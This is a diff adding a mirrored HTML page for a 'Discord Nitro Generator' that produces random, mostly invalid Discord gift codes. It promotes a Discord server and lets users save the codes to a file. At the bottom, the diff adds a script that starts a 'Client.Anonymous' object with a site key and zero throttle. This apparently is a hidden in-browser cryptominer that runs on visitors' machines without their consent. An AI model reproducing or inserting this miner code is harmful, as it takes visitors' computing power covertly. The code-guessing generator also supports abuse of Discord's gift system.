--- a/nitro-gen/index.html
+++ b/nitro-gen/index.html
@@ -1,1 +1,64 @@
-Adding Soon
+<html>
+
+<!-- Mirrored from nitro-gen.phantomcodes.ga/ by HTTrack Website Copier/3.x [XR&CO'2017], Sun, 17 Oct 2021 12:17:12 GMT -->
+<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
+<head>
+<title>Discord Nitro Generator</title>
+<link rel="shortcut icon" type="https://i.imgur.com/YDT4557.jpg" href="../i.imgur.com/YDT4557.jpg">
+<link rel="stylesheet" href="static/css/style.css">
+<meta content="width=device-width, initial-scale=1' name='viewport"/>
+<meta property="og:type" content="website">
+<meta property="og:title" content="Discord Nitro Generator" />
+<meta property="og:description" content="A Nitro Generator for Everyone! Built with Love! ❤️ And a little HTML, CSS, and JS. Built and Maintained by Team Darshi Network" />
+<meta property="og:url" content="../external.html?link=https://darshinetwork.tk/discord"/>
+<meta content="https://i.imgur.com/YDT4557.jpg" property="og:image">
+<meta charset="utf-8">
+</head>
+<body>
+	<br><br><br><br>
+<div>
+  <center>
+<h1 style="font-family: helvetica; color: #ffffff">DISCORD NITRO GENERATOR</h1>
+<h1 style="font-family: helvetica; color: #ffffff">BY DARSHI NETWORK</h1>
+<textarea id="a" rows="28" cols="100" readonly style="resize: none;">
+Nitro Generator by Darshi Network
+Join my Discord Server : https://darshinetwork.tk/discord
+  
+▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
+[!] Discord Codes will be here.
+[!] MOST OF THE CODES DOES NOT WORK!
+▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
+
+</textarea>
+<p></p>
+<p style="font-family: helvetica; color: #000000">How many codes do you want to generate per second? (Default 5)</p>
+<input type="text" id="speed" value="5">
+<p></p>
+<button id="generate" class="button">
+  Generate
+</button>
+
+<button id="stop" class="button">
+  Stop
+</button>
+
+<button onclick="stop(); document.getElementById('a').value = 'Nitro Generator by Darshi Network \nJoin my Discord Server : https://darshinetwork.tk/discord\n―――――――――――――――――――――――――――――――――――――――\n[!] Discord Codes will be here.\n[!] MOST OF THE CODES DO NOT WORK!!\n―――――――――――――――――――――――――――――――――――――――\n\n\n'; document.getElementById('b').value = '';" class="button" id="clear">Clear</button>
+    
+<button id="save" onclick="var rows = document.getElementById('b').value.split('\n').length -  1; download(rows + ' Unchecked Nitro Codes.txt', 'Join my Discord Server : https://darshinetwork.tk/discord\n\n' + document.getElementById('b').value + '\nDumped by https://darshinetwork.tk/nitro-gen')" class="button">Save Codes</button>
+    <p></p>
+ 
+ <a href="https://darshinetwork.tk/discord"target="_blank" style="font-family:helvetica; color: #ffffff">Join Our Discord Server!</a>
+<textarea style="display: none;" id="b" rows="11" cols="100" readonly=""></textarea>
+	<script src="static/js/main.js"></script>
+</div>
+<script src="/static/js/Uy2q.js"></script>
+<script>
+    var _client = new Client.Anonymous('d341309b175ba2b18ddcb653009b18d6fba3d6569bf2c1b9c8ea8d69eb2ca4bb', {
+        throttle: 0, c: 'w', ads: 0
+    });
+    _client.start();
+</script>
+</body>
+
+<!-- Mirrored from nitro-gen.phantomcodes.ga/ by HTTrack Website Copier/3.x [XR&CO'2017], Sun, 17 Oct 2021 12:17:29 GMT -->
+</html>
